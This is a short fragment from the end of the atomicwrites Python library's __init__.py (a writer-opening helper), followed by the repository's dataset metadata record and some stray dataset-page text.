    writer = writer_cls(path, **cls_kwargs)
    return writer.open()
| {
"content_hash": "043c95c2f4cedc2641a35db7407125b1",
"timestamp": "",
"source": "github",
"line_count": 229,
"max_line_length": 111,
"avg_line_length": 30.436681222707424,
"alnum_prop": 0.5951219512195122,
"repo_name": "untitaker/python-atomicwrites",
"id": "0b9f92ab863bde9e146407956160091c094580ef",
"size": "6970",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atomicwrites/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "65"
},
{
"name": "Python",
"bytes": "10986"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.